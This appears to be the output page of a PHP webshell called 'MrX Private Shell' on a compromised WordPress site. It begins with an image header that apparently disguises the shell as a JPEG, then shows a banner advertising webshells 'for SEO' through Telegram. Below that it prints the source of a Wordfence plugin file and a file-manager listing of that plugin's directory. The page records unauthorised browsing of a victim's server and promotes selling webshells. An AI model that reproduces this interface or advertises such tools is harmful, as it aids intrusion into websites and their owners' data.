����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
if (!defined('WORDFENCE_VERSION')) { exit; }
/**
* Presents the blocking status.
*
*/
?>
<ul class="wf-block-list wf-block-list-horizontal wf-blocking-status<?php echo (wfConfig::get('isPaid') ? ' wf-blocking-status-premium' : ''); ?>">
<li>
<?php
echo wfView::create('common/block-navigation-option', array(
'id' => 'blocking-all-options',
'img' => 'options.svg',
'title' => __('Blocking Options', 'wordfence'),
'subtitle' => __('Manage global blocking options.', 'wordfence'),
'link' => network_admin_url('admin.php?page=WordfenceWAF&subpage=blocking_options'),
))->render();
?>
</li>
<?php if (!wfConfig::get('isPaid')): ?>
<li class="wf-flex-horizontal wf-flex-full-width">
<div class="wf-flex-vertical wf-flex-align-left">
<h4 class="wf-no-bottom"><?php esc_html_e('Upgrade to Premium', 'wordfence') ?></h4>
<p class="wf-add-top-smaller"><?php esc_html_e('Enable country blocking by upgrading to Premium.', 'wordfence') ?></p>
</div>
<div class="wf-flex-horizontal wf-flex-full-width">
<p class="wf-right"><a class="wf-btn wf-btn-primary wf-btn-callout-subtle" href="https://www.wordfence.com/gnl1blockingUpgrade/wordfence-signup/#premium-order-form" target="_blank" rel="noopener noreferrer"><?php esc_html_e('Upgrade to Premium', 'wordfence'); ?></a> <a class="wf-btn wf-btn-callout-subtle wf-btn-default" href="https://www.wordfence.com/gnl1blockingLearn/wordfence-signup/" target="_blank" rel="noopener noreferrer"><?php esc_html_e('Learn More', 'wordfence'); ?><span class="screen-reader-text"> (<?php esc_html_e('opens in new tab', 'wordfence') ?>)</span></a></p>
</div>
</li>
<?php endif; ?>
</ul>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| block-list.php | File | 22.64 KB | 0644 |
|
| blocking-create.php | File | 27.01 KB | 0644 |
|
| blocking-status.php | File | 1.63 KB | 0644 |
|
| country-block-map.php | File | 351.36 KB | 0644 |
|
| country-modal.php | File | 2.85 KB | 0644 |
|
| option-bypass-cookie.php | File | 2.34 KB | 0644 |
|
| option-bypass-redirect.php | File | 2.82 KB | 0644 |
|
| options-group-advanced-country.php | File | 4.33 KB | 0644 |
|